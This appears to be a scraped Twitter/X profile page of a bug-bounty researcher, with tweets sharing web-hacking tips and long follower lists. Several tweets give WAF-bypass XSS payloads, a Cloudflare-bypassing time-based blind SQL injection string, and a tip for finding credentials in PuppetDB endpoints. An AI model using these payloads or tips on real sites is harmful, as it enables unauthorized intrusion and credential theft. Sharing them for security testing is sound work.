Petru Surugiu @pedro_infosec
Joined March 2012-
Tweets615
-
Followers68
-
Following1K
-
Likes33
Nice one with HTML entities and double encoding by @BRuteLogic <Svg/OnLoad=alert%25%0A26lpar;1)> with some more encoding: \%0A74Svg/On%0ALoad=alert%25%0A26lpar;1%25%0A26rpar;>
🚨 SSTI → RCE → Reverse shell on. Jinja2 template injection in the Title field allowed arbitrary command execution (whoami: web). More details, PoC, and mitigations are available on our WhatsApp channel. whatsapp.com/channel/0029Vb… #BugBounty #SSTI #RCE
Seeing someone’s credentials are always a dopamine! When you come across a puppetDB instance dont forget to check the endpoint /pdb/query/v4/resources . . #bugbounty #bugbountytips #hackerone #bugcrowd #hack #pentest #TogetherWeHitHarder
Recently updated Proof-of-Concepts github.com/0xMarcio/cve
I received an email from a reader asking if I could explain the payload of the "XSS without () and ;" here is it I am not the one who invent it, just someone trying to explain every details of it. Based on it, we can also make it worked in both browsers blog.huli.tw/2025/09/15/en/…
Use NextJS? Recon Tip by renniepak A quick way to find "all" paths for Next.js websites: DevTools->Console console.log(__BUILD_MANIFEST.sortedPages) javascript:console.log(__BUILD_MANIFEST.sortedPages.join('\n')); #infosec #cybersec #bugbountytips
🚨 New Templates Bounty Issue 💰 CVE-2024-46982 - Next.js - Web Cache Poisoning 💰 👾 Issue: github.com/projectdiscove… #bugbounty #NucleiTemplates #cve #opensource
Cloudflare 403 bypass to time-based blind SQLi: PL: (select(0)from(select(sleep(10)))v) → 403 but PL: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) → Time-based Blind SQLi #BugBounty #SQLi
Found a great waf bypass for client side path traversal (a thread)
have you tried this site for xss payload ? tinyxss.terjanq.me
I just found a WAF bypass for Akamai and Cloudflare: <address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>
Typical CSS injection often relies on repeated context loading (usually via iframes) to exfiltrate sensitive tokens. I found this tool by @ixSly that's both fast and works in Chrome and Safari. It can leak tokens with just a single CSS import by leveraging -webkit-cross-fade 🤯…
Path traversal opens doors to secrets, source code and even RCE when chained with other exploits 📂 Level up your #BugBounty hunting skills with our practical guide to path traversal and arbitrary file read attacks 👇 yeswehack.com/learn-bug-boun…
HTTP Headers Every Hacker Should Know (Bypass Techniques)
Just released a new recollapse version thanks to @ryancbarnett and @4ng3lhacker after their talk in @BlackHatEvents today. What’s new? 💥Mode 6: Fuzz case folding/upper/lower 💥 Mode 7: Fuzz byte truncations 💥 Recollapse is now available to use as a python library and…
Top 10 #XSS Payloads By @RodoAssis #BugBounty #PenTesting rodoassis.medium.com/top-10-xss-pay…
Sean Beatty @SeanBeatty56262
47 Followers 1K Following
pawlo @teodor440
3 Followers 69 Following
Laluka@OffenSkill @TheLaluka
5K Followers 1K Following Sharing is Caring, Hacker, Eternel Learner, Cat! =^~^=
Eusebiu Blindu @testalways
12K Followers 9K Following General stuff, tech, security, travel. testing. Movie extra in Borat, Bloodrayne. Puzzles, comments, opinions
episodexonx @episodexonx
0 Followers 8 Following
adk @andreigrigoruta
206 Followers 487 Following Living in the simulation. #Bitcoin #Elrond #TSLA🚘⚡🔋 #SpaceX 🌎 #Starship 🚀
iosifache @iosifache
157 Followers 416 Following security @ snap | security @ ubuntu, cybersec startup lead, officer in previous lives | software security, open source
Oste @oste_ke
7K Followers 6K Following ᴄʏʙᴇʀꜱᴇᴄᴜʀɪᴛʏ | ᴅꜰɪʀ 🛡️. ᴄᴛꜰ ᴘʟᴀʏᴇʀ @fr334aksmini | ꜰᴏᴜɴᴅɪɴɢ ʙᴏᴀʀᴅ ᴍᴇᴍʙᴇʀ @hih_community | #OpenSource ᴛɪɴᴋᴇʀᴇʀ | 𝕏 |
termtype @termtype
504 Followers 3K Following eval('al' + 'er' + 't(\'' + '@termtype ownz yew by default' + '\')');
Prem @prem_kakkassery
9 Followers 267 Following
vladz @v14dz
301 Followers 524 Following
Graphics World @RobinHooD_BD
160 Followers 2K Following I am a Graphics Designer. Order at [email protected]🤠
Brutal Secrets @brutalsecrets
271 Followers 297 Following Private results of @brutelogic research including vectors/payloads, techniques and tools. Getting back soon.
WebmasterAZ @webmasteraz
211 Followers 1K Following Follow #webmasteraz to get #deals #specialoffers for #domain, #webhosting and other tools for Webmaster. From A to Z
OpenDocument @opendocument
5K Followers 4K Following Welcome to the unofficial OpenDocument Format channel on Twitter. General information in English, Spanish or Portuguese. News, tips, tricks, apps and more!
BlackHatCoupons @CouponsBlackHat
261 Followers 3K Following Unbelievable coupon savings and shopping deals for your favorite blackhat software, services, and more - fresh new coupons always at your fingertips!
Asif baig @AsifBaig330
61 Followers 756 Following Founder & CTO @ Veracity Info Parks CISSP, C|EH Certified | Penetration tester | Bug Bounty Hunter 😎
gabriel lawrence @gebl
2K Followers 3K Following mastodon: https://t.co/Cn4uf9OJdY #BlackLivesMatter #StopSystemicOppression he/him
harisec @har1sec
8K Followers 3K Following Interested in web security, bug bounties, machine learning and investing. SolidGoldMagikarp. Orson Kovacs.
Stacy Hargreaves @auriemma23
71 Followers 622 Following Team leader at a Sixant Marketing. All view my own.
Marketing Duchess @PalaceGirl7
211 Followers 946 Following Did you see what I did there? No? Good. Online marketing girl.
JessTDrake @JessTDrake
125 Followers 996 Following Must stop eating cake, love movies, games, gym, just normal stuff. Mom.
Alexis Dawood @Alexis_Dawood
1K Followers 2K Following Fixated with marketing my online business, blogging and learning. Will only follow people I think I can learn from and perhaps JV with.
JS0N Haddix @Jhaddix
167K Followers 7K Following CEO, CISO, Trainer, Hacker, and Speaker. Cybersecurity + Hacking + AI + Sec Leadership @arcanuminfosec
Juana Renburg @Juana_Renburg
299 Followers 2K Following Blogger, social media marketing girl, own business and like to travel.
Helen Coffens @helenekhgf8o1
81 Followers 611 Following Run an online marketing agency with my man, always looking to team up and share information.
Kallie Manual @Kallie_Manual
200 Followers 1K Following Marketing blogger, now reaching 7K readers every day. Loving the fact people share my passion.
Laura Carlmorris @VILLAgirl999
242 Followers 1K Following Self employed writer, affiliate marketer and all round money grabber.
Janine Hamb @Janine_Hamb
250 Followers 2K Following Blogger, Online Marketer, work part time for a digital marketing agency. Happy to share what I know.
Lida Bory @Lida_Bory
2K Followers 2K Following Online marketing blogger, content marketing expert. Always looking to share great information and JV.
Mezza Kayles @CastleGirl79
210 Followers 1K Following Intelligent and modest, I make niche affiliate websites and even make money.
Cherry Hayles @foxesfox88
276 Followers 955 Following A rare female breed of php developer and content writer. Always looking to network.
Melvin Shadrick @MelvinShadrick
70 Followers 596 Following I love learning about SEO, marketing and all related things.
Toddy Boy @TrudeauTodd
60 Followers 743 Following Internet marketing, coding, writing, making money. Skydiver.
Kerry Hayles @cahoola
409 Followers 2K Following Fashion blog owner. Also dabble with affiliate marketing.
Jenni Kerrigan @BroadwayMacken1
62 Followers 709 Following Expert affiliate marketer, passionate about all online business.
Rodrigo Escobar @ipaxdc
811 Followers 920 Following Sr. Malware Research Mgr @ GoDaddy / Sucuri Inc. | Web Malware Analysis | Reverse Eng | Passionate about protecting the Web | Tweets and Thoughts are my own
Damaris Grona @Damaris_Grona
189 Followers 1K Following No seriously, I tweet too much, don't get my tweets on yr phone.
Code_13x ( Jelison Fe... @code_13x
2K Followers 477 Following Security Researcher || Bug Hunter || H1 Clear Verified || CVE-2025-20258
sw33tLie @sw33tLie
10K Followers 917 Following Web application hacker, 25yo. Top 30 @ https://t.co/wX0yr85Tzk https://t.co/ZI7a8oJJcQ https://t.co/LGYK7tMOGo
xploiterr @_xploiterr
2K Followers 935 Following Let everything happen to you, just keep going… like she said. ✍️ Write-ups → https://t.co/2ki4J3756e
Martin Doyhenard @tincho_508
3K Followers 227 Following Security Researcher at PortSwigger. Speaker at BlackHat, DEF CON, RSA, Hack In The Box, Troopers, EkoParty
xssdoctor @xssdoctor
4K Followers 373 Following hacker and cardiologist… not necessarily in that order
Brian Smith @sirwart
1K Followers 311 Following
Justin Gardner @Rhynorater
35K Followers 2K Following Christian | Full-time Bug Bounty Hunter | Host of @ctbbpodcast | Advisor @CaidoIO | 4x LHE MVH | 🗣️ English, 日本語 | ♥️ @mariahchan_ ♥️
pawlo @teodor440
3 Followers 69 Following
Laluka@OffenSkill @TheLaluka
5K Followers 1K Following Sharing is Caring, Hacker, Eternel Learner, Cat! =^~^=
Rebane @rebane2001
7K Followers 2K Following 🇪🇪🏳️⚧️ | Archivist | 9 CVEs in Chrome | CSS noob | MapartCraft | Horse | rebane2001#3716 | Lyra 🦊 @[email protected]
chompie @chompie1337
83K Followers 1K Following hacker, weird machine mechanic, X-Force Offensive Research (XOR)
Ebrietas @Ebrietas0
5K Followers 188 Following Security @ Phantom Wallet, former TikTok & Blizzard. All tweets are my own.
Assetnote @assetnote
10K Followers 0 Following Assetnote combines advanced reconnaissance and high-signal continuous security analysis to help enterprises gain insight and control of their evolving exposure.
张惠倩 @momika233
18K Followers 222 Following Anda boleh melakukan segala-galanya dari syurga ke bumi, wanita kecil!! If you have any questions, please contact me https://t.co/MkzsavUU9V
KNOXSS @KN0X55
15K Followers 0 Following Announcements, tips and support via DM of KNOXSS - Online #XSS PoC Tool by @BRuteLogic
Kévin GERVOT (Mizu) @kevin_mizu
6K Followers 756 Following Researcher for @ctbbpodcast lab 🐛 | DOMLogger++ developer 👨🏻💻 | CTF with @FlatNetworkOrg, @rhackgondins 🦦 | @ECSC_TeamFrance 2023 🇫🇷
anna @meowkoteeq
12K Followers 530 Following i'm good at all kinds of computer. i love my wife and my wife. i miaow. i'm an ARAR unit. i sell flippers at @flipper_zero, but opinions are my own. 🐈❤️🐈⬛
Will Schroeder @harmj0y
48K Followers 960 Following Researcher @SpecterOps. Coding towards chaotic good while living on the decision boundary.
Luke Stephens (hakluk... @hakluke
96K Followers 2K Following Hacker, marketer. I manage socials and produce amazing technical blogs for cybersecurity orgs. Founder of @hacker_content and @haksecio
Godfather Orwa 🇯�... @GodfatherOrwa
25K Followers 2K Following Hacker | Bug Hunter | Cooker | Top 5 P1 Warrior On https://t.co/dzFQH75OWj | LevelUpX Champion | 10+ 0Days/CVEs
Rodolfo Assis @RodoAssis
10K Followers 121 Following That #XSS and #WAF #bypass guy. @BRuteLogic @KN0X55
Shebu @_sh3bu
922 Followers 958 Following Product Security @Philips | Masters in CyberSecurity @AMRITAedu https://t.co/z0UsaqFOJ0
Tib3rius @0xTib3rius
69K Followers 597 Following Cybersecurity Content Creator | UwU-Anointed Wapp King | DEF CON Gameshow Host | Ex-Brit | https://t.co/04RRExvxXj (he/him) 🇺🇸 A deeply unserious person.
adk @andreigrigoruta
206 Followers 487 Following Living in the simulation. #Bitcoin #Elrond #TSLA🚘⚡🔋 #SpaceX 🌎 #Starship 🚀
Andreas Finstad - (4n... @4nqr34z
1K Followers 270 Following C|EH, C|NDA, MCP, CCNA, AWSC. @nRadioApp. Cyber Security Researcher/Specialist Youtube: https://t.co/jvTq9LlcA6 Mastodon: [email protected] #infosec
ShimizuKawasaki @shimizukawasak
1K Followers 113 Following
FatalSec @SecFatal
483 Followers 92 Following Technology enthusiast and mobile security researcher experienced in pentesting of mobile apps. Reach out at [email protected] for technical consultation.
Anysphere @anysphere
8K Followers 7 Following We're building AI tools to help humans focus on bigger problems. In particular: @cursor_ai
jswzl @WeaselJs
1K Followers 1 Following jswzl helps make web application testing easier with static analysis, making it easier to audit JS code and do your recon/mapping
Burp Suite Ninja🥷 @BurpSuiteNinja
399 Followers 1 Following Unleash the ninja within at https://t.co/Qhc8K1TD9a by SecProject Ltd. - This account is not affiliated with PortSwigger
stacksmashing @ghidraninja
48K Followers 452 Following Security researcher with a focus on hardware & firmware. I occasionally publish stuff on YouTube. Co-founder of @hextreeio. Contact: [email protected]
Riccardo Pau @profxeni
779 Followers 348 Following #OSint and Digital Forensics Specialist, Cyber-Investigator, Tech Enthusiast, #debunker. https://t.co/2DYU06UIvv
Stacy Hargreaves @auriemma23
71 Followers 622 Following Team leader at a Sixant Marketing. All view my own.
Asif baig @AsifBaig330
61 Followers 756 Following Founder & CTO @ Veracity Info Parks CISSP, C|EH Certified | Penetration tester | Bug Bounty Hunter 😎
WebmasterAZ @webmasteraz
211 Followers 1K Following Follow #webmasteraz to get #deals #specialoffers for #domain, #webhosting and other tools for Webmaster. From A to ZTrends for United States
You might like
